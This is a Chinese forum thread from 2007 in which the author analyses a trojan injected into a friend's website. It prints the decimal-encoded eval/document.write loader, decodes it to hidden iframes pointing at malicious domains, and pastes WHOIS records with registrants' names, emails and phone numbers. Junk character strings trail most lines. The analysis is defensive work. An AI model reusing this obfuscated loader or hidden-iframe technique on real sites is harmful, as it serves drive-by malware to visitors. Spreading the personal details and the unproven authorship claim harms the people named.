社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 5880阅读
  • 2回复

[原创]一篇刚写的分析木马手记

级别: 店掌柜
发帖
5692
铜板
103378
人品值
1520
贡献值
26
交易币
0
好评度
5373
信誉值
0
金币
0
所在楼道

首发在我的博客里面, %h*5xB]Tt  
Dc:DY:L^  
http://www.areway.cn/?p=175 swZpWC  
UH40~LxIma  
BvJ=iB<E  
周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码: 9.8,q  
          X% J%A-k]  
<script>t=’60,105,102,114,97,109,101, 3}4#I_<$F@  
32,115,114,99,61,104,116,116,112,58,47,47, t,Q'S`eTU  
102,114,101,101,46,117,45,117,117,117,46,99, i<:p.ug-O  
110,47,101,114,114,111,114,46,104,116,109, 6UB6;-  
32,119,105,100,116,104,61,49,48,48,32,104,  ^@q#$/z  
101,105,103,104,116,61,48,62,60,47,105,102, x^2 W?<  
114,97,109,101,62′; `E;)`J8b  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> C9Wojo.  
                                                                                                  %gTVW!q  
<script>t=’60,105,102,114,97,109,101,32,115, ((9YG  
114,99,61,104,116,116,112,58,47,47,102,114, s"rg_FoL  
101,101,46,117,45,117,117,117,46,99,110,47, ohTd'+Lm  
101,114,114,111,114,46,104,116,109,32,119, kknhthJ  
105,100,116,104,61,49,48,48,32,104,101,105, G1r V<,#m  
103,104,116,61,48,62,60,47,105,102,114,97, SY8U"Qc;9  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); 6 5"uD7;  
document.write(t);</script> -7 L  
                                                                                                  &G=0  
<html xmlns=” 4(sttd_  
http://www.w3.org/1999/xhtml iE+6UK  
“> K051usm  
<head> s<#N]mp'   
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> C$ hQN  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> q-uLA&4  
<title>首页 - 爱生活家庭网 Wa}"SqYr h  
                                                                                                                                                    w%I8CU_}.  
上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。 xx6S`R6:  
转换字符串后的大概内容是(谁点击后果自付): EFv4=OWB  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… &$Ci}{{n#  
                                                                                                                                  w?/f Zx  
查询玉米u-uuu.cn的详细信息: "<T ~jk"u  
Domain Name: u-uuu.cn hJ4S3b  
ROID: 20070901s10001s64972306-cn iGQ n/Xdo  
Domain Status: ok VB's  
Registrant Organization: 王雷 }2mI*"%)\u  
Registrant Name: 王雷 -Fa98nV.WB  
Administrative Email: czlovexs@126.com tUrNp~ve,  
Sponsoring Registrar: 北京万网志成科技有限公司 PgTDjEo  
Name Server:ns.yovole.com 2gH _$  
Name Server:ns1.yovole.com <YSg~T  
Registration Date: 2007-09-01 17:54 b+_hI)T  
Expiration Date: 2008-09-01 17:54 0hb/`[Q  
最后PING了一下地址 都没有什么…. OU6^+Ta  
                                                                                                [}@n*D$  
上虚拟机里面继续分析,IE里面打开上面的连接…查看源代码…..直接又有嵌套. #9INX`s-  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> ` )]lUvR  
<script language=”javascript” src=” z=[l.Af_  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script ^YqbjL  
> G6<HO7\  
这个玉米应该有可能是木马作者的: R^|!^[WE  
foafau.info的详细信息: q< b"M$  
Access to INFO WHOIS information is provided to assist persons in qZ233pc  
determining the contents of a domain name registration record in the cJ2y)`  
Afilias registry database. The data in this record is provided by aDXpkG0E  
Afilias Limited for informational purposes only, and Afilias does not _J` |<}?t;  
guarantee its accuracy.  This service is intended only for query-based (26Bs':M~  
access. You agree that you will use this data only for lawful purposes ?${V{=)*X'  
and that, under no circumstances will you use this data to: (a) allow, C1n? ?Y[  
enable, or otherwise support the transmission by e-mail, telephone, or j_(?=7Y3g  
facsimile of mass unsolicited, commercial advertising or solicitations  &Q<EfB  
to entities other than the data recipient’s own existing customers; or \I:UC %  
(b) enable high volume, automated, electronic processes that send oO8]lHS?@  
queries or data to the systems of Registry Operator, a Registrar, or wXP_]-  
Afilias except as reasonably necessary to register domain names or EQ6l:[  
modify existing registrations. All rights reserved. Afilias reserves Zb}`sk#  
the right to modify these terms at any time. By submitting this query, :l4^iSf  
you agree to abide by this policy. rtcJ=`)0`  
Domain ID:D22418703-LRMS 6|%^pjX5  
Domain Name:FOAFAU.INFO @Ap@m6K?q  
Created On:20-Nov-2007 16:05:42 UTC >y&[BB7S6  
Last Updated On:20-Nov-2007 16:05:44 UTC 4$ ..r4@  
Expiration Date:20-Nov-2008 16:05:42 UTC zI1(F67d`  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) d$4WK)U  
Status:CLIENT DELETE PROHIBITED t;h+Cf4  
Status:CLIENT RENEW PROHIBITED U`:lAG  
Status:CLIENT TRANSFER PROHIBITED ZDW,7b% U  
Status:CLIENT UPDATE PROHIBITED  fF\*v  
Status:TRANSFER PROHIBITED b?sA EU;  
Registrant ID:GODA-040110615 i:MlD5 F  
Registrant Name:liu hong |}l@w +N3  
Registrant Organization: Ma% E&.ed  
Registrant Street1:beijing /,=Wy"0TJ  
Registrant Street2: 8[vl3C  
Registrant Street3: niXHK$@5  
Registrant City:beijing @\#'oIc|  
Registrant State/Province: "K9vm^xP  
Registrant Postal Code:100000 'SsPx&)l  
Registrant Country:CN Y+|L 3'H  
Registrant Phone:+86.860108888777 /%2:+w  
Registrant Phone Ext.: pyu46iE)  
Registrant FAX: l=Vowx.$2f  
Registrant FAX Ext.: V5hp Y ]  
Registrant Email:bbbshiji@163.com |:!E HFr  
Admin ID:GODA-240110615 s?4%<jz  
Admin Name:liu hong BiVd ka  
Admin Organization: " 8~f  
Admin Street1:beijing ;mCGh~?G  
Admin Street2: {s9y@c*15.  
Admin Street3: |;x fe"]  
Admin City:beijing g?k#wj1uH  
Admin State/Province: nPQZI6>  
Admin Postal Code:100000 ]w1BJZa36  
Admin Country:CN n_e}>1_  
Admin Phone:+86.860108888777 eH"qI2A  
Admin Phone Ext.: <z~2d  
Admin FAX: NgDZ4&L  
Admin FAX Ext.: %[+a[/  
Admin Email:bbbshiji@163.com e<: 4czh8  
Billing ID:GODA-340110615 .j'@K+<45  
Billing Name:liu hong ogkz(wZ  
Billing Organization: .3S\Rrv  
Billing Street1:beijing j\jL[hG_  
Billing Street2: Q"l"p:n%n  
Billing Street3: y \mutm  
Billing City:beijing B.CH9M  
Billing State/Province: J?|K#<%  
Billing Postal Code:100000 FVvv   
Billing Country:CN U{U:8==  
Billing Phone:+86.860108888777 VR5e CJ:i  
Billing Phone Ext.: .f?qUg  
Billing FAX: ,YAPCj  
Billing FAX Ext.: m=("N  
Billing Email:bbbshiji@163.com } Y7W1$he  
Tech ID:GODA-140110615 E'Fv *UA  
Tech Name:liu hong 2f}K #i8   
Tech Organization: B~ 'VDOG$Z  
Tech Street1:beijing ZmYSi$B  
Tech Street2: ]IbPWBX  
Tech Street3: !?us[f=g%  
Tech City:beijing d =B@EyN  
Tech State/Province:  '!r+Tz  
Tech Postal Code:100000 uZ=UBir  
Tech Country:CN S,)|~#5x  
Tech Phone:+86.860108888777 CLFxq@%nu~  
Tech Phone Ext.: J4*:.8Ki  
Tech FAX: ac+k 5K+  
Tech FAX Ext.: nDoiG#N0  
Tech Email:bbbshiji@163.com 4/-))F&s  
Name Server:NS27.DOMAINCONTROL.COM ftI+#0?[!  
Name Server:NS28.DOMAINCONTROL.COM 8KL_PwRX_f  
Name Server:  HN~v&,  
Name Server: KWn1%oGJ  
Name Server: >b!X&JU  
Name Server: D-b2E6 o6  
Name Server: 5M\=+5wB  
Name Server: 9Qs"X7iH  
Name Server: /i~^LITH  
Name Server: *3etxnQc  
Name Server: 'Kso@St`o  
Name Server: #@\NdW\  
Name Server: u6S0t?Udap  
                                                                                                          / Vm}+"BCS  
接着下载每个文件里面的代码: ~b6<uRnM.  
一步一步看.. mJDKxgGK  
Oih2UrF  
1N$gE  
F#}1{$)% /  
ap$ tu3j  
s eZ<52f2  
都是十进制的代码,也懒得再分析了,有这个爱好的大家可以继续试试
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水

简单生活
执著追求
别笑我浅溥,天真的以为用一腔真诚就能感动这个冷漠的世界。
也别说我幼稚,竟想用不长的人生去诠释繁杂的红尘。
然而除了真诚,我还能给你什么,的确我真的一无所有!

级别: 店掌柜
发帖
4241
铜板
744
人品值
897
贡献值
7
交易币
0
好评度
2216
信誉值
0
金币
0
所在楼道
只看该作者 1 发表于: 2007-12-17
看过了就是没看懂。。。
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2007-12-18
要是有全部 就好了 传上来
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八